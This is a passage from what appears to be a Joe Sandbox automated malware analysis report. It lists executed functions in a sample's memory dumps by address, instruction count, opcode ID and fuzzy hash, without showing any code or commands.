                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FindHandleModuleResource
                                                                          • String ID: RTL
                                                                          • API String ID: 3537982541-834975271
                                                                          • Opcode ID: 67741c8e250af4df1feb39339d0e7ed97aad30ee6416bac10ecf672c326b3f31
                                                                          • Instruction ID: 033f4390bc0fdb3b805028b430356c414522e496817541b4e162cf7f5bd5bf70
                                                                          • Opcode Fuzzy Hash: 67741c8e250af4df1feb39339d0e7ed97aad30ee6416bac10ecf672c326b3f31
                                                                          • Instruction Fuzzy Hash: CDC01271A40710A6EA34A7646D4DB837A595B00B3AF090848B281EE2D1DAA9C980A6A0

                                                                          Executed Functions

                                                                          Function 00007FFD9BAA0D4C Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5[_H
                                                                          • API String ID: 0-3279724263
                                                                          • Opcode ID: b992f2cf213fc05a4d5af4f85c01f70981374f532bd8830ada3bd0b236cce4fa
                                                                          • Instruction ID: 9fe726cabfbc0c8c7754e034d104ae7db19e07461a80eee7c83611541d645665
                                                                          • Opcode Fuzzy Hash: b992f2cf213fc05a4d5af4f85c01f70981374f532bd8830ada3bd0b236cce4fa
                                                                          • Instruction Fuzzy Hash: 3B910172A19A8D4FE799DB6C88657ED7BE1FF99314F0001BED009CB2E6CBB418208750
                                                                          Function 00007FFD9BEA919F Relevance: .7, Instructions: 738COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 441b66fb4bf18c9a4cf1c6181bf13ea46ce0bf3bcedff398bd02a655543574dc
                                                                          • Instruction ID: 301a14bc16fbeec825959e871770455465bdb3996b763157770a66e21c024e40
                                                                          • Opcode Fuzzy Hash: 441b66fb4bf18c9a4cf1c6181bf13ea46ce0bf3bcedff398bd02a655543574dc
                                                                          • Instruction Fuzzy Hash: 2F52D474A196598FDF6CCF58C4E96B877A9FF48300F1041BED45ECB296CA39A981CB40
                                                                          Function 00007FFD9BAA0E43 Relevance: .2, Instructions: 172COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ecf35492d30a1c7931baaf4d46d8d0e2fca3450ca4bdcb92a923ab1fc887f553
                                                                          • Instruction ID: cdc02c679668099df59fee9c80a1a2187f763679618ce4e3a869c8f1c25ec1c3
                                                                          • Opcode Fuzzy Hash: ecf35492d30a1c7931baaf4d46d8d0e2fca3450ca4bdcb92a923ab1fc887f553
                                                                          • Instruction Fuzzy Hash: B851DE76A19A498BE7ACCB5C8869BFD7BE1EB99324F4002BED00DD67D5CAB414208740
                                                                          Function 00007FFD9BEADE08 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: ae3df67af872ad5dadab0ed8c4d1e5b42a401bb0d2f6fee22bd2d0663bd601d8
                                                                          • Instruction ID: fc0fab53fd62037963a1665691c96502165b0b7f1399db913c0f71dfc4235259
                                                                          • Opcode Fuzzy Hash: ae3df67af872ad5dadab0ed8c4d1e5b42a401bb0d2f6fee22bd2d0663bd601d8
                                                                          • Instruction Fuzzy Hash: 51517EB1E0A60E9FDB58DB98C4605FDB7B5FF58300F1081BED01AE72A2CA356A01CB40
                                                                          Function 00007FFD9BEA8F28 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 675659abeacec8dc1e45935d0b62106949adec82bbf7c080a1aaf4397b5038a3
                                                                          • Instruction ID: 33103714cda549593b0ecf787c6b1c53c4ea6d4a9bde54ac5508bc335eb0c080
                                                                          • Opcode Fuzzy Hash: 675659abeacec8dc1e45935d0b62106949adec82bbf7c080a1aaf4397b5038a3
                                                                          • Instruction Fuzzy Hash: AF518075E0960E8FDB59DB98C8A55BDBBB5FF48300F1141BED01AE72E6CA356A01CB40
                                                                          Function 00007FFD9BEA3F48 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 85536f679e3a65ec271c699d15d8fe09069269dbcc768db792b299257dbe44c2
                                                                          • Instruction ID: f9e2f802ba03c6c8c6266d3c5da9be475fbad0f52bfa97f423e78f9bd352cf3d
                                                                          • Opcode Fuzzy Hash: 85536f679e3a65ec271c699d15d8fe09069269dbcc768db792b299257dbe44c2
                                                                          • Instruction Fuzzy Hash: 19518C71E0A64E8FDB69DB98C4A05FDBBB5EF49300F1141BED01AE72D2CA356A05CB01
                                                                          Function 00007FFD9BEABD80 Relevance: .7, Instructions: 692COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd7fc79d27ef8c73a2ed20a596e76956ef010bb2d9aab741ab7aef880c06cff7
                                                                          • Instruction ID: 2479ba3a14a7fef4793c6ecf3234b38f4d75f1b6d20f6eb0fa44953b737b410e
                                                                          • Opcode Fuzzy Hash: dd7fc79d27ef8c73a2ed20a596e76956ef010bb2d9aab741ab7aef880c06cff7
                                                                          • Instruction Fuzzy Hash: 1432A470B09A0D8FDBA8DB58C8A5A7877E9FF58311B1141B9D00EC72A2DE25ED45CB80
                                                                          Function 00007FFD9BEA41AF Relevance: .4, Instructions: 439COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 443e9b1d9cee4c3cfecce924e5e0e50361dced7e124218a1f15f066f87101a73
                                                                          • Instruction ID: ed51b97b165b0b8043dcea352f423430893d4ab34bcfc76dfd3ddf9b0e4da7fd
                                                                          • Opcode Fuzzy Hash: 443e9b1d9cee4c3cfecce924e5e0e50361dced7e124218a1f15f066f87101a73
                                                                          • Instruction Fuzzy Hash: 94F10370A1964A8FEB59CF58C4E05B43BB9FF45300B5541BDC84ACB69BCA39F981CB41
                                                                          Function 00007FFD9BEAE07F Relevance: .4, Instructions: 422COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1203c39614b9776509deb37912d5c7943c7be8ded49a16b1990b87be327d3fe4
                                                                          • Instruction ID: 58e64a23e8633d9f67b66c0e7cfb9a8ea16830674f5f98cad60e6116e3c967c1
                                                                          • Opcode Fuzzy Hash: 1203c39614b9776509deb37912d5c7943c7be8ded49a16b1990b87be327d3fe4
                                                                          • Instruction Fuzzy Hash: F0F1F5706195598FEB58CF58C4E06B43BA9FF44300F6545BDD84ECB29ACA39F981CB40
                                                                          Function 00007FFD9BEA635C Relevance: .4, Instructions: 418COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 641322ab7df6568d4ff1b4be7fa636e59304f3529035e4fb7d73df58a0f7514a
                                                                          • Instruction ID: 5946c7a8c9d624654801461071caeeafc6aa54d3b5c575c4dff9a3f006e2eb0c
                                                                          • Opcode Fuzzy Hash: 641322ab7df6568d4ff1b4be7fa636e59304f3529035e4fb7d73df58a0f7514a
                                                                          • Instruction Fuzzy Hash: F2513657F0E11A8DF2347A9D78314FC234CAFE773AB164277E55D890E69C0A3A8941D1
                                                                          Function 00007FFD9BEA51F1 Relevance: .4, Instructions: 406COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f3bbe7290e44b515e926ffd18cb526149ee5d306b19cb7dd5d9dc15f730c387
                                                                          • Instruction ID: 1851b06d807248b1db2ee26adedf0813c8938c0543b183dd8a3c14c6999db291
                                                                          • Opcode Fuzzy Hash: 2f3bbe7290e44b515e926ffd18cb526149ee5d306b19cb7dd5d9dc15f730c387
                                                                          • Instruction Fuzzy Hash: 1BD11470A0EB0A8FD378DB58D4A157977E9FF44300B11457EC08FC36A6DE2AB9468B41
                                                                          Function 00007FFD9BEAA207 Relevance: .4, Instructions: 390COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e4e3afe1e586839420a680785464859e9e3f69e967d60fe14fb41a14e18e9b69
                                                                          • Instruction ID: 76bd9e986b0ee29e65d0f8fdd98a9f4d0687cac1a54ef5d7611d6fa44ce74112
                                                                          • Opcode Fuzzy Hash: e4e3afe1e586839420a680785464859e9e3f69e967d60fe14fb41a14e18e9b69
                                                                          • Instruction Fuzzy Hash: C1D15870A0EB0E8FE379DB58C4A457877E9FF44300F11557ED08AC76A2DA2AB9428B41
                                                                          Function 00007FFD9BEA41CF Relevance: .3, Instructions: 337COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e04872bd5d5b2a1bd74acb0773a4698d689c4aaaf6082fd74ee0de736bce7064
                                                                          • Instruction ID: 936a48a6714ed36739c23d72714b946bb11e375897544396b8beeae03f14a783
                                                                          • Opcode Fuzzy Hash: e04872bd5d5b2a1bd74acb0773a4698d689c4aaaf6082fd74ee0de736bce7064
                                                                          • Instruction Fuzzy Hash: 5DC1B07061A54A8FEB2DCF48C0F05B137B9FF45310B5546BDD84B8B69ACA39E981CB41
                                                                          Function 00007FFD9BEA91BF Relevance: .3, Instructions: 336COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f74fac8e1aace170f9e9d8073b9abb1023ae2ca0b81f8aece0ebfee9aeea235
                                                                          • Instruction ID: 3e88551042d24e77a83920b9881dc45cbebcb185f107e85508a26c2a4e41466f
                                                                          • Opcode Fuzzy Hash: 6f74fac8e1aace170f9e9d8073b9abb1023ae2ca0b81f8aece0ebfee9aeea235
                                                                          • Instruction Fuzzy Hash: 3CC1E17461A51A8FEF2DCF58C0E85B037A9FF45301B5146BDC84B8B69BCA39E541CB80
                                                                          Function 00007FFD9BEAE09F Relevance: .3, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b0854fcd59aefe6f1ccd7327e5fbb190d2f60c6a78a3117c7de281a22872a5d
                                                                          • Instruction ID: ac71ff6f4258a402bc7d2c3c71eb8ea54cd15b99fd6230f164d93819f5b818e3
                                                                          • Opcode Fuzzy Hash: 2b0854fcd59aefe6f1ccd7327e5fbb190d2f60c6a78a3117c7de281a22872a5d
                                                                          • Instruction Fuzzy Hash: F7C1167061A54A8FEB1DCF84C4E05B53BA9FF45301B6545BDE84B8B69BCA38F942CB40
                                                                          Function 00007FFD9BEAD932 Relevance: .3, Instructions: 328COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2269092137da3a4322e714e164feffe89fe82b9c0742cd44a999716e070e8648
                                                                          • Instruction ID: 00c191704e23e545ee42f2e91836913b6911bcab2c9dca2b0f59046b75d6cfbc
                                                                          • Opcode Fuzzy Hash: 2269092137da3a4322e714e164feffe89fe82b9c0742cd44a999716e070e8648
                                                                          • Instruction Fuzzy Hash: 48C1F370B1AA4A8FE759DB58C0A06B4B7E8FF58300F458179D04EC7AE6DB29B951C780
                                                                          Function 00007FFD9BEAB2F7 Relevance: .3, Instructions: 311COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38398d9df2d884fff508d028d238305ad429c91f082af9158adbd470ed970023
                                                                          • Instruction ID: f0315c1b8506a4dd7e7aa9d0e23f69cf908ce1ccf5468e19e0cc33905566b626
                                                                          • Opcode Fuzzy Hash: 38398d9df2d884fff508d028d238305ad429c91f082af9158adbd470ed970023
                                                                          • Instruction Fuzzy Hash: 0B21F79AF0F19B86F63561B928321FC364D6F54332F1A02B7D54D860F2DC4E3A855292
                                                                          Function 00007FFD9BEA1447 Relevance: .3, Instructions: 308COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 154a6a14e1f96fc876b04d22ff1defd5822515b1aa253cfba076fc6ceccb72db
                                                                          • Instruction ID: 38a12a0085259c9f961bf50f995fdbe0128e50ca235d4dfcef5ec5bfc23fe1ad
                                                                          • Opcode Fuzzy Hash: 154a6a14e1f96fc876b04d22ff1defd5822515b1aa253cfba076fc6ceccb72db
                                                                          • Instruction Fuzzy Hash: 5621E892F0F69A8AF73556A868314F85A8D5F97734F1E02B6D48DC90E2DC0A2A45C383
                                                                          Function 00007FFD9BEA6EC0 Relevance: .3, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 550ba950573604869be8e0dc0e0d2bc89d2870e9a2793ef7787a903deef63324
                                                                          • Instruction ID: 80b041b4ab21dc15961cf6e07744dd8a117770ed90c2f467d492e3a7a07ca96e
                                                                          • Opcode Fuzzy Hash: 550ba950573604869be8e0dc0e0d2bc89d2870e9a2793ef7787a903deef63324
                                                                          • Instruction Fuzzy Hash: 6391C430B19A1D8FDB58DF58C8999B9B3E6FF55314B1581AAD04EC72A2DA31FC42CB40
                                                                          Function 00007FFD9BEA7F86 Relevance: .3, Instructions: 274COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1311e645c7db7773f956abf0529d494e7df99431d30f1ac26a1a80ca6664876e
                                                                          • Instruction ID: 9ee8edb1c8377aa4a950d3795e7cc00ffb4a0f1ac107626b51df2e0b8fc2afb7
                                                                          • Opcode Fuzzy Hash: 1311e645c7db7773f956abf0529d494e7df99431d30f1ac26a1a80ca6664876e
                                                                          • Instruction Fuzzy Hash: 13818A71F0EA0E4FF37C9A6894A15757BE8EF95310B56017EE08FC3192DE2A79028741
                                                                          Function 00007FFD9BEA6470 Relevance: .3, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4628e90fcb0b41cf8da9f5e7ab7a795f92fe008d8526cfcdc13b5fc9dd37e811
                                                                          • Instruction ID: 7c887a3272cbadef1f6cb55925b7140c34a494bf19f615585ac189a91d358806
                                                                          • Opcode Fuzzy Hash: 4628e90fcb0b41cf8da9f5e7ab7a795f92fe008d8526cfcdc13b5fc9dd37e811
                                                                          • Instruction Fuzzy Hash: 9511A5D2F0F59B8EF6784BA41931178155C6FE3F55F1A02BAD54E8A0F2DC0E3B441282
                                                                          Function 00007FFD9BEACE66 Relevance: .3, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ac36abe8302caaf1185b48193ce360fda8853a3a1ee42dd0f4fe5b9e1e305945
                                                                          • Instruction ID: 73fc8bd7c25cc2d5522b7dfebc9106f986a69470db0f2a10224577069ea639d1
                                                                          • Opcode Fuzzy Hash: ac36abe8302caaf1185b48193ce360fda8853a3a1ee42dd0f4fe5b9e1e305945
                                                                          • Instruction Fuzzy Hash: 10817B71F0E64E4FE3399A589861079B7EDEF85310B16457EE08FC32A2DE2AB5028741
                                                                          Function 00007FFD9BEA2F96 Relevance: .3, Instructions: 262COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4962d8062983cb100de4686478bb27741afde75fcd5012298337a9ff872d758
                                                                          • Instruction ID: c9cb868c31704d7ffc682e8b74fab4f02adf7a06f93e761190b7a4f9d90280ec
                                                                          • Opcode Fuzzy Hash: a4962d8062983cb100de4686478bb27741afde75fcd5012298337a9ff872d758
                                                                          • Instruction Fuzzy Hash: A681AD71F0E64A4FE37A5A9894A14757BECEF91310F16057EE48FC31A3DE2AB9028741
                                                                          Function 00007FFD9BEA10F9 Relevance: .2, Instructions: 245COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b40747845f08dbfce4793d9d970e68f9ca744edecbb5925c1a064839fad39ed
                                                                          • Instruction ID: 0a0f0dda179373f8bc01704fdf93d854f360265b750df8d1ee8a4ad25a0cfd40
                                                                          • Opcode Fuzzy Hash: 4b40747845f08dbfce4793d9d970e68f9ca744edecbb5925c1a064839fad39ed
                                                                          • Instruction Fuzzy Hash: B67146B0B0E54D4FE778DA5884765B83BCCEF56310B0602B9D09EC35B2DD19EA06C382
                                                                          Function 00007FFD9BEAAFA9 Relevance: .2, Instructions: 243COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2e4aeb94db05c79b55a42f4290c8a7688aae7bfcf875d57cf6c2aec79d076bb2
                                                                          • Instruction ID: 8df62c3ca7cea959d704cf3e00e9d5f3fda2dc0c8e8dbb305c99c66f21df99f2
                                                                          • Opcode Fuzzy Hash: 2e4aeb94db05c79b55a42f4290c8a7688aae7bfcf875d57cf6c2aec79d076bb2
                                                                          • Instruction Fuzzy Hash: 59714BB9A0E54D8FE778DA7884E65B437CCFF54310B120279D0AFC75B2DD19AA068781
                                                                          Function 00007FFD9BEABB6B Relevance: .2, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8e871b9c9057858f037ce7e03872df859609512bd37a50352c611aef6befced2
                                                                          • Instruction ID: 2b453c4f69541fd45a0aec5e26762648c17e0ce084085a67c3403d92f2627ccc
                                                                          • Opcode Fuzzy Hash: 8e871b9c9057858f037ce7e03872df859609512bd37a50352c611aef6befced2
                                                                          • Instruction Fuzzy Hash: 1471D474E1E64E8EEBA9DBB48860ABC7BB9FF45300F1105BAD00EC71E5DE3969418740
                                                                          Function 00007FFD9BEA6CAB Relevance: .2, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 412f6ba4e41dc0324848b9d7f7ae39511b1c6d25166af56428e7040e13964d3b
                                                                          • Instruction ID: 2aabd2660c4cdf7bd3df7e954ceba2893b7f47d9ebdd9caa53c17738dfa14a19
                                                                          • Opcode Fuzzy Hash: 412f6ba4e41dc0324848b9d7f7ae39511b1c6d25166af56428e7040e13964d3b
                                                                          • Instruction Fuzzy Hash: 2F71E570E1D54E8FEB69EBA4C8646BCBBB8FF46340F11057AD00ED71E5DA3A6A419700
                                                                          Function 00007FFD9BEA1CBB Relevance: .2, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24409876def899d3c8100011b8ffe99b331063794c96883e59e24086bb41e6fe
                                                                          • Instruction ID: c2c00932501de2a040c5aa8568cb3913752efc02e41ee5543215726a00dd54b9
                                                                          • Opcode Fuzzy Hash: 24409876def899d3c8100011b8ffe99b331063794c96883e59e24086bb41e6fe
                                                                          • Instruction Fuzzy Hash: C571D370E1E64E8EEB69DBA488606BCBBB9FF4A300F110579D00ED71E1DE396941C742
                                                                          Function 00007FFD9BEA6112 Relevance: .2, Instructions: 215COMMON
                                                                          Download Yara Rule
